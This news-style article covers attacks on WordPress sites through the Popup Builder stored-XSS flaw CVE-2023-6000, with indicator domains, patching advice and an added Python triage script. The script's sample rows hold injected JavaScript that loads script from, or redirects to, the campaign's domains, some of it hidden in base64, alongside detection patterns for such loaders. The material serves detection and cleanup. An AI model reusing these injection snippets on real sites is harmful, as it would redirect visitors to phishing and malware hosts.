WordPress Plugin Vulnerability: 3,300 Sites Compromised by Malware Attack

Hackers are exploiting a vulnerability in outdated versions of the Popup Builder plugin for WordPress and have infected more than 3,300 websites with malicious code. The flaw, tracked as CVE-2023-6000, poses a significant threat to site administrators who have not promptly updated the plugin.

The issue was first disclosed in November 2023: Popup Builder versions 4.2.3 and older contain a stored cross-site scripting (XSS) vulnerability that lets an attacker save arbitrary JavaScript in a popup's settings. Although an earlier Balada Injector campaign had already abused the same flaw on more than 6,700 websites, many site admins have still not patched it.

Sucuri, a web security firm, has detected a surge of attacks over the past three weeks targeting the same Popup Builder vulnerability. A search on PublicWWW, a source-code search engine, finds the injections from this latest campaign on 3,329 WordPress sites; Sucuri's own scanners have detected 1,170 infections.

The attackers compromise a site by injecting malicious JavaScript into the plugin's Custom JavaScript or Custom CSS sections in the WordPress admin interface. Popup Builder stores these snippets in the 'wp_postmeta' database table and registers them as event handlers for its popup actions, so the injected code runs in each visitor's browser whenever a popup fires. The code's primary purpose is to redirect visitors to malicious destinations, including phishing pages and sites that drop malware.

To defend against these attacks, block the two domains used by the campaign, "ttincoming.traveltraffic[.]cc" and "host.cloudsonicwave[.]com", at the firewall or DNS level. Blocking the domains only cuts off the current payload, so site administrators running Popup Builder must also update to the latest version (currently 4.2.7), which fixes CVE-2023-6000 along with other security issues.

Challenge Ahead:
Despite the urgency, WordPress plugin directory statistics indicate that more than 80,000 active sites still run Popup Builder 4.1 or older, leaving a substantial attack surface. Site owners must remain vigilant and proactive in upgrading their plugins to keep their websites secure.

Mitigation and Recovery:
If a site is already infected, cleanup means removing the malicious entries from Popup Builder's Custom JavaScript and Custom CSS sections and then scanning the site thoroughly for hidden backdoors that could lead to reinfection. Update the plugin as part of the cleanup; a site that is cleaned but left unpatched can simply be reinjected. Analysts have seen the injected code redirect visitors to specific attacker-controlled URLs, which underlines how damaging these infections are for a site's visitors.
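As an added example (not code from the original article, from Sucuri, or from the Popup Builder project), the following Python triage script ties the points above together: it checks whether an installed Popup Builder version falls in the affected range (4.2.3 and older) or below the 4.2.7 release, and it scans rows exported from wp_postmeta for the two indicator domains, including a hostname hidden in a base64 blob that a loader would decode with atob(), as well as for snippets that load script from hosts other than the site's own. The row format (the table's meta_id, post_id, meta_key and meta_value columns passed as dicts), the own-host allowlist, the sample rows and the domain cdn.unknown-example.net are all constructed for the example; the meta_key values are placeholders, not the plugin's real keys.

```python
"""Triage helper for the Popup Builder (CVE-2023-6000) injections described above.

Added example; not code from the article, from Sucuri, or from the Popup Builder
project. Assumed (not from the article): wp_postmeta rows arrive as dicts using the
table's column names, the site's own hostnames are passed as an allowlist, and the
sample rows and the domain cdn.unknown-example.net are constructed for the demo.
"""
import base64
import binascii
import re
from collections.abc import Iterable
from dataclasses import dataclass

# Indicator domains named in the article (defanging brackets removed so they match raw data).
IOC_DOMAINS = ("ttincoming.traveltraffic.cc", "host.cloudsonicwave.com")
LAST_AFFECTED = (4, 2, 3)   # Popup Builder 4.2.3 and older are affected by CVE-2023-6000
FIXED_VERSION = (4, 2, 7)   # release the article tells administrators to update to

_HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Constructs a redirect or remote-script loader needs; on their own they only earn "review".
_LOADER_RE = re.compile(
    r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=|window\.location|"
    r"location\.(?:href|replace|assign)|atob\(",
    re.I,
)


def parse_version(text: str) -> tuple[int, ...]:
    """'4.2.3' -> (4, 2, 3); any non-numeric suffix is ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def cve_2023_6000_exposed(version: str) -> bool:
    """True when the installed version is 4.2.3 or older."""
    return parse_version(version) <= LAST_AFFECTED


def update_required(version: str) -> bool:
    """True when the installed version is below the 4.2.7 release."""
    return parse_version(version) < FIXED_VERSION


def _decoded_blobs(value: str) -> Iterable[str]:
    """Decode base64-looking tokens; injected loaders often hide the hostname this way."""
    for blob in _B64_RE.findall(value):
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue


@dataclass(frozen=True)
class Finding:
    meta_id: int
    post_id: int
    severity: str            # "ioc": named indicator present; "review": loads code from an unknown host
    hosts: tuple[str, ...]


def scan_postmeta(rows, own_hosts=()) -> list[Finding]:
    """Flag wp_postmeta rows that reference an indicator domain or pull script from a foreign host."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for row in rows:
        value = row["meta_value"]
        # Search the raw value and every decoded base64 payload, all lower-cased.
        texts = [value.lower(), *(t.lower() for t in _decoded_blobs(value))]
        ioc_hits = tuple(d for d in IOC_DOMAINS if any(d in t for t in texts))
        if ioc_hits:
            findings.append(Finding(row["meta_id"], row["post_id"], "ioc", ioc_hits))
            continue
        hosts = {h for t in texts for h in _HOST_RE.findall(t)}
        foreign = tuple(sorted(hosts - own))
        if foreign and any(_LOADER_RE.search(t) for t in texts):
            findings.append(Finding(row["meta_id"], row["post_id"], "review", foreign))
    return findings


SAMPLE_ROWS = [  # constructed for this example, not captured data; meta_key values are placeholders
    {"meta_id": 101, "post_id": 7, "meta_key": "sample_custom_js",
     "meta_value": "console.log('popup opened');"},
    {"meta_id": 102, "post_id": 7, "meta_key": "sample_custom_js",
     "meta_value": "var s=document.createElement('script');"
                   "s.src='//ttincoming.traveltraffic.cc/';document.head.appendChild(s);"},
    {"meta_id": 103, "post_id": 9, "meta_key": "sample_custom_js",
     # atob('aHR0cHM6Ly9ob3N0LmNsb3Vkc29uaWN3YXZlLmNvbS8=') == 'https://host.cloudsonicwave.com/'
     "meta_value": "window.location=atob('aHR0cHM6Ly9ob3N0LmNsb3Vkc29uaWN3YXZlLmNvbS8=');"},
    {"meta_id": 104, "post_id": 9, "meta_key": "sample_custom_js",
     "meta_value": "var s=document.createElement('script');"
                   "s.src='https://cdn.unknown-example.net/x.js';document.head.appendChild(s);"},
    {"meta_id": 105, "post_id": 11, "meta_key": "sample_custom_css",
     "meta_value": ".popup{background:url(https://www.example.com/bg.png)}"},
]

if __name__ == "__main__":
    for v in ("4.1", "4.2.3", "4.2.7"):
        print(v, "exposed" if cve_2023_6000_exposed(v) else "not exposed",
              "/ update required" if update_required(v) else "/ current")
    for f in scan_postmeta(SAMPLE_ROWS, own_hosts=("www.example.com",)):
        print(f)
```

Rows flagged "ioc" are the entries to delete from the custom sections; "review" rows need a human look, because legitimate custom JavaScript can also load from a CDN. The base64-hidden hostname in row 103 is caught because every base64-looking token is decoded before searching, which a plain `LIKE '%traveltraffic%'` query against the table would miss.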

Staying informed and proactive remains crucial. The Popup Builder vulnerability is a stark reminder that timely updates and diligent security practices are what keep a website from being exploited. Site administrators must act now to secure their sites and protect visitors from harm.
